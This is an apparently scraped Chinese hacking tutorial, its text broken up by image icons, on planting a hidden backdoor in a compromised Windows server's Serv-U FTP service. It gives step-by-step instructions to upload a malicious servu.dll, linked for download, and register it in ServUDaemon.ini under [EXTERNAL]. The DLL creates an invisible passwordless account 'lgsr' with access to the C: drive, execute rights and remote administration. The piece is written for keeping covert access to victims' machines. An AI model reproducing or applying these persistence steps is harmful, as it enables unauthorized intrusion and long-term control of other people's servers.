现在大多数
![](/icons/79207de.gif)
WINDOWS服务器都使用SERV-U做FTP服务器
![](/icons/79207dou.gif)
直到serv-u5.2版为止仍然存在本地权限提升漏洞
![](/icons/79207dou.gif)
在获得了最高控制权限的后
![](/icons/79207dou.gif)
需要留下
![](/icons/79207yi.gif)
个隐蔽
![](/icons/79207de.gif)
后门
![](/icons/79207dou.gif)
以备我们下次光临
![](/icons/79207dou2.gif)
查看
![](/icons/79207dou.gif)
serv-u
![](/icons/79207de.gif)
帮助文件可知
![](/icons/79207dou.gif)
serv-u提供了
![](/icons/79207yi.gif)
个扩展
![](/icons/79207de.gif)
接口
![](/icons/79207dou.gif)
通过这个接口可以管理用户
![](/icons/79207de.gif)
![](/icons/79207de.gif)
访问权限
![](/icons/79207dou2.gif)
所以我们就很容易就根据这个接口留下
![](/icons/79207yi.gif)
个后门
![](/icons/79207dou2.gif)
下面是我写
![](/icons/79207de.gif)
![](/icons/79207yi.gif)
个扩展
![](/icons/79207chengxu.gif)
![](/icons/79207dou.gif)
实现
![](/icons/79207de.gif)
功能是
![](/icons/79207dou.gif)
如果是帐号lgsr来登陆
![](/icons/79207dou.gif)
就不需要密码
![](/icons/79207dou.gif)
同时把服务器
![](/icons/79207de.gif)
C:\盘映射到该帐号
![](/icons/79207de.gif)
主目录
![](/icons/79207dou.gif)
同时赋予lgsr帐号
![](/icons/79207de.gif)
远程管理权限
![](/icons/79207dou2.gif)
下载地址为:
http://www.yueyong.net/down/ServuBack.rar
安装思路方法:
ServuBack.rar解压
![](/icons/79207dou.gif)
把servu.dll上传到肉鸡上serv-u安装目录
![](/icons/79207dou.gif)
把打开配置文件ServUDaemon.ini
![](/icons/79207dou.gif)
在文件末尾添加
[EXTERNAL]
ClientCheckDLL1=servu.dll
保存
![](/icons/79207dou.gif)
重新启动
![](/icons/79207dou.gif)
serv-u服务
![](/icons/79207dou.gif)
OK
![](/icons/79207dou.gif)
现在在本地打开SERV-U
![](/icons/79207de.gif)
管理
![](/icons/79207chengxu.gif)
ServUAdmin.exe
![](/icons/79207dou.gif)
右键新建
![](/icons/79207yi.gif)
个服务器
![](/icons/79207dou.gif)
输入肉鸡
![](/icons/79207de.gif)
IP地址
![](/icons/79207dou.gif)
帐号lgsr,密码随便填
![](/icons/79207dou.gif)
再填上肉鸡
![](/icons/79207de.gif)
FTP端口
连接
![](/icons/79207dou.gif)
好了
![](/icons/79207dou.gif)
现在可以远程管理肉鸡上
![](/icons/79207de.gif)
FTP了
![](/icons/79207dou.gif)
可以随便添加帐号
![](/icons/79207dou.gif)
修改帐号
![](/icons/79207dou2.gif)
另外可以直接用FTP软件Software用帐号lgsr登陆
![](/icons/79207dou.gif)
密码随便填
![](/icons/79207dou.gif)
就可以访问肉鸡
![](/icons/79207de.gif)
C盘
![](/icons/79207dou.gif)
上传
![](/icons/79207dou.gif)
修改文件
![](/icons/79207dou.gif)
并具有执行权限
在肉鸡
![](/icons/79207de.gif)
SER-U管理
![](/icons/79207chengxu.gif)
并不会显示lgsr这个帐号在帐号列表里面
![](/icons/79207dou.gif)
但是当用lgsr帐号连接时时可以看到连接
![](/icons/79207de.gif)
帐号名和IP地址
上
篇文章: 3389端口攻击思路方法
下
篇文章: 教你轻松破解验证码 - 解读百度贴吧杀手源代码
延伸阅读
最新评论